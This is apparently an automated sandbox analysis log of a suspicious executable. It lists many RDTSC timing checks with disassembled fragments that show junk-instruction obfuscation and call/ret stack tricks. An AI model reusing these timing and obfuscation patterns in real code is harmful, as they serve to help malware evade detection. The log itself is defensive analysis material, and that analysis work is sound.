                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA182E second address: FA1878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jg 00007F4FE915D6AAh 0x0000000d nop 0x0000000e mov di, dx 0x00000011 movsx ebx, bx 0x00000014 push 00000000h 0x00000016 pushad 0x00000017 add ecx, dword ptr [ebp+122D3B3Ah] 0x0000001d popad 0x0000001e push 00000000h 0x00000020 jmp 00007F4FE915D6B7h 0x00000025 xchg eax, esi 0x00000026 pushad 0x00000027 pushad 0x00000028 je 00007F4FE915D6A6h 0x0000002e pushad 0x0000002f popad 0x00000030 popad 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA1878 second address: FA187E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA187E second address: FA188A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA188A second address: FA1891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA26D8 second address: FA26F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F92D second address: F9F932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA26F0 second address: FA2739 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F4FE915D6A8h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 mov bh, 3Ah 0x00000029 push 00000000h 0x0000002b sub dword ptr [ebp+122D2D18h], ecx 0x00000031 push 00000000h 0x00000033 sub dword ptr [ebp+122D2C01h], ebx 0x00000039 push eax 0x0000003a pushad 0x0000003b push edi 0x0000003c push edi 0x0000003d pop edi 0x0000003e pop edi 0x0000003f push ebx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F932 second address: F9F9E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F4FE9502C56h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F4FE9502C5Bh 0x00000014 nop 0x00000015 mov ebx, dword ptr [ebp+122D1B7Bh] 0x0000001b push dword ptr fs:[00000000h] 0x00000022 jmp 00007F4FE9502C66h 0x00000027 mov dword ptr fs:[00000000h], esp 0x0000002e adc edi, 6B37ADDAh 0x00000034 mov eax, dword ptr [ebp+122D1081h] 0x0000003a push 00000000h 0x0000003c push eax 0x0000003d call 00007F4FE9502C58h 0x00000042 pop eax 0x00000043 mov dword ptr [esp+04h], eax 0x00000047 add dword ptr [esp+04h], 00000015h 0x0000004f inc eax 0x00000050 push eax 0x00000051 ret 0x00000052 pop eax 0x00000053 ret 0x00000054 mov di, 0206h 0x00000058 push FFFFFFFFh 0x0000005a push 00000000h 0x0000005c push eax 0x0000005d call 00007F4FE9502C58h 0x00000062 pop eax 0x00000063 mov dword ptr [esp+04h], eax 0x00000067 add dword ptr [esp+04h], 00000016h 0x0000006f inc eax 0x00000070 push eax 0x00000071 ret 0x00000072 pop eax 0x00000073 ret 0x00000074 mov edi, dword ptr [ebp+122D3B02h] 0x0000007a nop 0x0000007b push eax 0x0000007c push edx 0x0000007d jnc 00007F4FE9502C63h 0x00000083 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA09BD second address: FA09C3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA09C3 second address: FA09D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FE9502C5Ah 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA0AD5 second address: FA0ADA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA0ADA second address: FA0AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA3788 second address: FA378E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA378E second address: FA37A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jg 00007F4FE9502C6Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007F4FE9502C56h 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA39E1 second address: FA39F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA39F5 second address: FA39FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F4FE9502C56h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA582A second address: FA588A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pushad 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c jmp 00007F4FE915D6B3h 0x00000011 popad 0x00000012 nop 0x00000013 mov bl, A0h 0x00000015 push 00000000h 0x00000017 cld 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007F4FE915D6A8h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 xchg eax, esi 0x00000035 jmp 00007F4FE915D6AAh 0x0000003a push eax 0x0000003b pushad 0x0000003c jp 00007F4FE915D6ACh 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA4A40 second address: FA4A44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAB152 second address: FAB158 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAB158 second address: FAB166 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAB166 second address: FAB16F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F47FF9 second address: F48001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F48001 second address: F48010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4FE915D6AAh 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F48010 second address: F4802C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4FE9502C58h 0x00000008 jmp 00007F4FE9502C5Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4802C second address: F48042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4FE915D6B2h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB1215 second address: FB1219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB1219 second address: FB121D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB121D second address: FB1256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4FE9502C64h 0x0000000e pushad 0x0000000f jmp 00007F4FE9502C67h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB1256 second address: FB125C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB125C second address: FB1261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB0BF4 second address: FB0C15 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4FE915D6A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F4FE915D6B7h 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB6DFB second address: FB6E00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB6E00 second address: FB6E06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB6E06 second address: FB6E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB6E0A second address: FB6E2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB6E2C second address: FB6E58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4FE9502C62h 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB6E58 second address: FB6E5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBB016 second address: FBB025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jo 00007F4FE9502C56h 0x0000000e popad 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBB025 second address: FBB052 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4FE915D6C0h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F4FE915D6AEh 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F52154 second address: F5218A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C5Ah 0x00000007 pushad 0x00000008 jmp 00007F4FE9502C69h 0x0000000d jmp 00007F4FE9502C5Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBF675 second address: FBF67B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBF67B second address: FBF69B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F4FE9502C6Bh 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBF69B second address: FBF6A5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4FE915D6ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBECC5 second address: FBECEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C5Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007F4FE9502C67h 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC4414 second address: FC4453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jg 00007F4FE915D6C3h 0x0000000d jmp 00007F4FE915D6ADh 0x00000012 js 00007F4FE915D6ACh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC32F0 second address: FC32F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8B7D4 second address: F8B822 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4FE915D6A8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f cld 0x00000010 lea eax, dword ptr [ebp+1248059Dh] 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F4FE915D6A8h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 or edi, dword ptr [ebp+122D3B3Eh] 0x00000036 nop 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F4FE915D6AFh 0x0000003e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8B8AF second address: F8B8CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8B8CB second address: F8B8F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F4FE915D6B8h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8BC11 second address: F8BC16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8BC16 second address: F8BC3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8BC3B second address: F8BC40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8BC40 second address: F8BC4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F4FE915D6A6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8BD55 second address: F8BD5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8BD5C second address: F8BD66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F4FE915D6A6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8BE56 second address: F8BE60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F4FE9502C56h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8BFAF second address: F8BFB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8BFB3 second address: F8C00A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e jmp 00007F4FE9502C63h 0x00000013 xchg eax, esi 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F4FE9502C58h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e jmp 00007F4FE9502C60h 0x00000033 nop 0x00000034 pushad 0x00000035 pushad 0x00000036 push edi 0x00000037 pop edi 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8C00A second address: F8C012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8C012 second address: F8C018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8C018 second address: F8C030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F4FE915D6ADh 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8C1A8 second address: F8C1C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4FE9502C5Eh 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8C1C4 second address: F8C1C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8C32A second address: F8C3BA instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4FE9502C56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F4FE9502C67h 0x0000000f popad 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007F4FE9502C58h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b mov edi, dword ptr [ebp+122D194Fh] 0x00000031 push 00000004h 0x00000033 push 00000000h 0x00000035 push edx 0x00000036 call 00007F4FE9502C58h 0x0000003b pop edx 0x0000003c mov dword ptr [esp+04h], edx 0x00000040 add dword ptr [esp+04h], 0000001Ah 0x00000048 inc edx 0x00000049 push edx 0x0000004a ret 0x0000004b pop edx 0x0000004c ret 0x0000004d nop 0x0000004e jmp 00007F4FE9502C61h 0x00000053 push eax 0x00000054 pushad 0x00000055 push ebx 0x00000056 jno 00007F4FE9502C56h 0x0000005c pop ebx 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 popad 0x00000061 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8CA4C second address: F8CA6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F4FE915D6AFh 0x0000000d jl 00007F4FE915D6ACh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8CA6B second address: F8CA78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8CA78 second address: F8CA91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4FE915D6ADh 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8CA91 second address: F8CABE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4FE9502C58h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e pushad 0x0000000f push ecx 0x00000010 jmp 00007F4FE9502C67h 0x00000015 pop ecx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC36F3 second address: FC3713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007F4FE915D6B8h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC3713 second address: FC3718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC3718 second address: FC375E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B7h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c jnc 00007F4FE915D6A6h 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F4FE915D6AAh 0x0000001e jmp 00007F4FE915D6B1h 0x00000023 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC375E second address: FC376F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC376F second address: FC377E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jnl 00007F4FE915D6A6h 0x0000000e popad 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC3A83 second address: FC3A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC3BBB second address: FC3BC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC3BC1 second address: FC3BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC3BC5 second address: FC3BE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F4FE915D6A6h 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC8AAB second address: FC8AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC8AAF second address: FC8ACE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F4FE915D6B5h 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC8ACE second address: FC8AD4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC8AD4 second address: FC8ADC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
